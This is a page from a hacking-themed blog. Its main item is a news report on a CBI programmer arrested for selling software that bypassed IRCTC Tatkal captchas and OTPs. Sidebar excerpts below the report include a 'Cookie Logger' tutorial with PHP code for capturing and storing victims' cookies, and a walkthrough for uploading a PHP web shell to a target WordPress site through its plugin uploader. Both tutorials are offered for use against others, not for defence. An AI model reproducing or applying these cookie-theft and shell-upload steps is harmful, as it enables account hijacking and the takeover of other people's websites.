Skip to main content

CBI techie nabbed over software that hacks Railways Tatkal ticket system

By

CBI techie nabbed over software that hacks Railways Tatkal ticket system 

 


  How do some travel agents manage to book confirmed railway tickets under Tatkal category, while thousands of passengers make unsuccessful bids on their computers or at reservation counters?

Well, it seems it is all programmed.
A software programmer of the anti-corruption agency CBI is alleged to be the brain behind one such illicit software which subverted the Railways reservation system, allowing the agents to book hundreds of Tatkal tickets at a single click of the mouse, officials said on Wednesday in New Delhi.  

The Central Bureau of Investigation (CBI) has arrested its assistant programmer Ajay Garg and his front, Anil Gupta, for developing and distributing the software to agents for a price, agency spokesperson Abhishek Dayal said.
Besides Garg and Gupta, the agency has booked 13 others, including Garg's family members and travel agents.

Garg's parents, wife, sister, and brother-in-law were allegedly instrumental in making collections from travel agents using his software, it said.
The money from the travel agents who booked tickets using his system was collected in bitcoins and through hawala channels to avoid scrutiny, he said, adding that 10 agents -- seven from Jaunpur and three from Mumbai -- have been identified in this connection so far.

"The case is in line with our policy of having a robust internal mechanism of ensuring probity and having a zero tolerance towards corruption," CBI Director Alok Verma said.
The ticket bookings under Tatkal quota open at 10 am for AC class and 11 am for non-AC coaches for the trains departing next day. Under the quota, a fixed number of seats, in each coach, are sold at a premium by the railways to travellers who need tickets urgently.

A common complaint of passengers is that by the time they enter details on the IRCTC website or complete the booking process, seats under the Tatkal quota get full within minutes of the start of booking. Their bookings are either rejected or they get a wait-listed ticket, that too at a very steep price.
Some travel agents offer to provide confirmed tickets under the quota by charging a premium over and above Railways' prices.

The arrest of Garg and Gupta has exposed the alleged software trickery used by them to exploit the vulnerabilities of IRCTC ticket booking system, they said.
Thirty-five-year-old software engineer Garg had joined the CBI in 2012 through a selection process and has been working as an assistant programmer. Earlier, he had served with IRCTC, which handles ticketing system of the railways, between 2007 and 2011.

The CBI probe so far has indicated that Garg learned the vulnerabilities of the IRCTC ticketing software during his tenure there which he exploited in his software, they said.
"These vulnerabilities still exist in the IRCTC system that is why his software was able to dodge it for booking tickets of hundreds of passengers at one go," an official said.

These tickets were genuine and the payments of the tickets went to the Railways, they said.
Garg, who is alleged to be the mastermind, acted in the background, while his front, Gupta, distributed the software to travel agents and collected money on his behalf.

"Use of such software is illegal as per rules and regulations of IRCTC and also under the Railways Act. It was also alleged that the accused was collecting money for the use of such software by certain booking agents and had amassed huge wealth from these activities," Dayal said.

The CBI has carried out searches at 14 locations in Delhi, Mumbai, and Jaunpur during which it recovered Rs 89.42 lakh in cash, gold jewellery valued at Rs 61.29 lakh, 15 laptops, 15 hard disks, 52 mobile phones, 24 SIM cards, 10 notebooks, six routers, four dongles and 19 pen drives, Dayal said.
Through the software, Garg was allegedly able to keep statement of tickets booked by the agents and charged them on every ticket, in addition to the cost of the software.

Once installed on the agents' computers, the software needed a username and password which Garg allegedly changed from time to time to ensure recurring payments, they said.

Garg used a complex chain of Indian and foreign servers, online masking and cryptocurrency to facilitate his operations, the officials said, adding that his luck ran out after the agency received source information about his operations.
He was kept under surveillance before being arrested after a late night operation by the agency. While Garg was arrested in New Delhi, Gupta was nabbed from Jaunpur.

"...it usually takes 120 seconds in normal course for generation of a single PNR but this illegal software enables the user to book multiple Tatkal tickets online in much less time," the CBI FIR alleged.

It said the software enables the user to save all required details to book Tatkal tickets beforehand in the software which are automatically filled-in the IRCTC portal as soon as Tatkal booking starts and PNR is generated very fast.

The software provides proxy IP addresses, bypassing IRCTC captcha, bypassing bank OTP, form autofill, login with multiple IDs with several pairs with the help of US-based server, allowing the users to fraudulently gain unauthorised access to computer network in contravention of rules and regulations.

"As number of seats available are limited, the use of this illicit software denies the genuine and authorised passenger a fair access to the IRCTC server to get confirmed Tatkal tickets," it alleged.


Labels:

Comments

Post a Comment

Popular posts from this blog

Assembly Language Step-by-step: Programming with DOS and Linux-

By
(-Assembly Language Step-by-step: Programming with DOS and Linux-) The bestselling guide to assembly language-now updated and expanded to include coverage of Linux . This new edition of the bestselling guide to assembly programming now covers DOS and Linux! The Second Edition begins with a highly accessible overview of the internal operations of the Intel-based PC and systematically covers all the steps involved in writing, testing, and debugging assembly programs. Expert author Jeff Duntemann then presents working example programs for both the DOS and Linux operating systems using the popular free assembler NASM. He also includes valuable information on how to use procedures and macros, plus rare explanations of assembly-level coding for Linux, all of which combine to offer a comprehensive look at the complexities of assembly programming for Intel processors. Providing you with the foundation to create executable assembly language programs, this book: * Explains how to use NASM
Post a Comment
Read more

Cookie Logger

By
         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary
Post a Comment
Read more

Bypass while FTP login during wordpress shell uploads .

By
In this post I will be telling you how to bypass FTP login during wordpress shell upload. Sometimes when we are shelling a Wordpress website by uploading a theme in a zip file, it asks for ftp login information. This can be easily Bypassed using the below Method .  First of all, Log In to your target wordpress website, then in the left side, look for  Plugin option, click on it and select  Add New . There you will see a page titled  Install Plugins,  below it look for the option  Upload  and click on it After clicking on the Upload option, you will get a new page asking you to upload the plugin, browse your.php shell for there and click on Upload After the upload process is completed, you'll get the following Just skip this forum, and you are done xD ! Suppose the name of your shell was code.php, so inorder to access it goto http://www.website.com/wp-content/uploads/code.php
Post a Comment
Read more